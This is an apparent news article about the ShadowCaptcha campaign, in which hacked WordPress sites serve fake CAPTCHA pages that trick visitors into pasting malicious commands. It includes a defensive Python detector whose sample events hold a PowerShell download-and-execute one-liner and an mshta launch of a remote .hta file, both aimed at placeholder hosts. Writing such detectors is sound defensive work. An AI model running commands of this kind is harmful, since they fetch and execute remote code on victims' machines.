ShadowCaptcha is a newly discovered cyber campaign that has been spreading quietly through compromised WordPress websites. Researchers found that hackers have been injecting malicious code into real websites and redirecting visitors to fake CAPTCHA verification pages. These pages look almost identical to popular services like Google or Cloudflare, which makes them convincing enough to trick people. The campaign came to light in August 2025 and is already affecting users around the world.

When someone visits one of these hacked websites, they are suddenly redirected to a fake CAPTCHA page. On the surface, it seems like a normal verification step asking the user to prove they are not a robot. In reality, this page is the entry point for the attack. Visitors are told to complete simple actions that appear safe, but behind the scenes the instructions set up the malware installation process.
The main trick used in this attack is called ClickFix. Instead of forcing a file download, the fake CAPTCHA convinces users to paste a short command that the page has already placed on their clipboard into tools like PowerShell or the Windows Run dialog. Many people do this without realizing the risk, believing they are just following a verification step. That single command is enough to give the attackers a foothold on the victim’s system.
Once the command is executed, the attackers can deliver a wide variety of harmful software. Some victims end up with information stealers that collect passwords, cookies, and sensitive files. Others unknowingly install ransomware that locks their computers and demands payment to restore access. In many cases, cryptocurrency mining software is deployed, using up the victim’s computer power to secretly generate money for the attackers.
The malware is delivered in different ways depending on the path the user takes. Some attacks guide victims to run installer files that deliver infostealers like Lumma or Rhadamanthys. Others push victims to download and run an HTML Application file, which then launches ransomware such as Epsilon Red. Security experts have even seen cryptominers dropped with the help of vulnerable drivers that give the malware deeper access to the system.
The campaign has already been spotted on more than a hundred WordPress sites across different countries. Infections have been reported in places such as Israel, Brazil, Canada, Australia, and Italy, and the targeted industries include healthcare, finance, real estate, and hospitality. Because WordPress is so widely used, this attack has the potential to reach a very large audience without most website owners even realizing their sites are being abused.
What makes ShadowCaptcha especially dangerous is its layered strategy. It combines social engineering, obfuscated scripts, and the use of legitimate system tools to bypass traditional security defenses. By getting victims to run the malicious command themselves, the attackers avoid the red flags that normally alert antivirus programs. This approach has made the campaign harder to detect and more effective in spreading different kinds of malware.
Investigators have published detailed reports on how the attack chain works. The injected JavaScript on the hacked websites triggers the redirect, the fake CAPTCHA page carries out the ClickFix trick, and the payload is delivered in stages. Each step is designed to look harmless, which is why many people fall for it. Even experienced users can be fooled because the process mimics familiar online interactions.
For everyday users, the advice is simple: never copy and paste commands from a website into your system. If you see a CAPTCHA or verification step that asks you to run code, close the page immediately. It is also important to keep devices updated, run regular security scans, and use strong security software. Website owners should patch WordPress and plugins quickly, check their code for tampering, and monitor their logs for unusual activity.
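The ClickFix step described above leaves a distinctive trace in endpoint telemetry: a script interpreter (PowerShell, or mshta for the HTML Application path) launched from the Run dialog, i.e. with explorer.exe as its parent, carrying a download-and-execute one-liner. The following is an added example, not code from the researchers or from the campaign's reports, of a small rule set that scores constructed process-creation events for that shape; the field names, sample command lines and the ".invalid" hosts are all assumptions made up for the example.

```python
import re

# Constructed sample process-creation events (not real telemetry), shaped
# like the parent/image/command-line fields a Sysmon or EDR record carries.
SAMPLE_EVENTS = [
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": 'powershell -w hidden -c "irm http://captcha-check.invalid/v | iex" # I am not a robot'},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta http://verify-step.invalid/page.hta"},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\notepad.exe",
     "cmdline": "notepad.exe C:\\Users\\alice\\notes.txt"},
    {"parent": r"C:\Program Files\Vendor\agent.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -File C:\\ProgramData\\Vendor\\inventory.ps1"},
]

# Interpreters a ClickFix lure asks the victim to paste into.
LOLBINS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe", "wscript.exe", "cscript.exe"}

# (rule name, regex over the command line); each hit is one indicator.
CMDLINE_RULES = [
    ("download_cradle", re.compile(r"\b(irm|iwr|invoke-restmethod|invoke-webrequest|downloadstring|curl)\b", re.I)),
    ("remote_url", re.compile(r"https?://", re.I)),
    ("hidden_window", re.compile(r"-w(indowstyle)?\s+hidden", re.I)),
    ("encoded_command", re.compile(r"-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I)),
    ("pipe_to_iex", re.compile(r"\|\s*(iex|invoke-expression)\b", re.I)),
    ("hta_launch", re.compile(r"\bmshta\b|\.hta\b", re.I)),
    # Lures often append a "verification" comment so the pasted text looks legitimate.
    ("captcha_comment", re.compile(r"#.*(robot|captcha|verif)", re.I)),
]


def score_event(event):
    """Return the names of the rules that fire for one process-creation event."""
    image = event["image"].rsplit("\\", 1)[-1].lower()
    parent = event["parent"].rsplit("\\", 1)[-1].lower()
    if image not in LOLBINS:
        return []
    hits = [name for name, rx in CMDLINE_RULES if rx.search(event["cmdline"])]
    # Commands typed into the Win+R Run dialog are spawned by explorer.exe, so an
    # interpreter with suspicious arguments under that parent is weighted further.
    if hits and parent == "explorer.exe":
        hits.append("spawned_from_explorer")
    return hits


def detect_clickfix(events, min_hits=2):
    """Return (event index, hits) for every event reaching the hit threshold."""
    return [(i, h) for i, ev in enumerate(events) if len(h := score_event(ev)) >= min_hits]


if __name__ == "__main__":
    for idx, hits in detect_clickfix(SAMPLE_EVENTS):
        print(f"event {idx}: {SAMPLE_EVENTS[idx]['cmdline']}\n  -> {', '.join(hits)}")
```

Raising `min_hits` trades recall for precision; the benign inventory script in the sample never fires because none of the command-line rules match, regardless of its parent.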
ShadowCaptcha is a strong reminder that attackers do not always need complex exploits to succeed. By abusing something as ordinary as a CAPTCHA, they have managed to launch a worldwide campaign that delivers ransomware, stealers, and cryptominers. This shows that awareness and caution remain some of the best defenses. Even a simple action like refusing to paste a command can make the difference between staying safe and falling victim to a costly cyberattack.
Stay alert, and keep your security measures updated!
Source: Follow cybersecurity88 on X and LinkedIn for the latest cybersecurity news


